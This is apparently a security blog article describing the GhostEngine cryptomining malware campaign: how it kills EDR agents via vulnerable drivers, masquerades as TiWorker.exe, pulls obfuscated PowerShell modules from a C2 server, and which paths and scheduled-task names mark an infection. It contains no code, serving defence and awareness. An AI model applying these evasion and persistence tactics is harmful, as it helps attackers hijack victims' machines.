The GhostEngine Malware Attempts to Use Your Computer for Cryptomining
![](https://www.cyclonis.com/images/2022/01/cryptotheft-765x511.jpg)
GhostEngine Malware is a sophisticated intrusion set that integrates various malicious modules, utilizing vulnerable drivers to disable security solutions and facilitate cryptomining. This malware, referred to as REF4578, employs GHOSTENGINE as its primary payload. Researchers have also identified parts of this intrusion set under the name HIDDENSHOVEL.
Table of Contents
Key Features and Tactics
Contingency and Duplication Mechanisms
GhostEngine Malware authors have incorporated numerous contingency and duplication mechanisms to ensure resilience and persistence. These mechanisms help maintain the malware's functionality even if parts of the operation are disrupted.
Disabling Security Solutions
GHOSTENGINE leverages vulnerable drivers to terminate and delete known Endpoint Detection and Response (EDR) agents. This step is crucial for allowing the deployment of the coin miner without interference from security software.
This malware campaign exhibits an uncommon level of complexity to ensure the installation and persistence of the XMRIG miner. It begins with the execution of a PE file named Tiworker.exe, which masquerades as the legitimate Windows TiWorker.exe. This action triggers a sequence of malicious activities.
Infection and Execution Process
Upon execution, the Tiworker.exe file downloads and executes a PowerShell script that orchestrates the entire intrusion flow. This binary runs a hardcoded PowerShell command to retrieve an obfuscated script, get.png, which downloads additional tools, modules, and configurations from the attacker's command and control (C2) server.
GHOSTENGINE is responsible for retrieving and executing modules on the infected machine. It primarily uses HTTP to download files from a configured domain, with a backup IP if domains are unavailable. FTP serves as a secondary protocol, using embedded credentials for added redundancy.
System Cleanup and Persistence
The script downloads and executes clearn.png, a component designed to remove remnants of prior infections. It cleans malicious files located in directories such as C:\Program Files\Common Files\System\ado and C:\PROGRA1\COMMON1\System\ado. Additionally, it removes scheduled tasks named:
- Microsoft Assist Job
- System Help Center Job
- SystemFlushDns
- SystemFlashDnsSrv
Artifacts of these scheduled tasks may indicate previous infections.
Importance of Removing GhostEngine Malware
Removing GhostEngine Malware is crucial to prevent your system from being exploited for cryptomining. Cryptomining without consent can significantly slow down your computer and lead to increased energy consumption and costs.
Protecting Your Information
Ensuring the removal of this malware helps protect your system's information from being shared with malicious actors, thereby safeguarding your personal and professional data.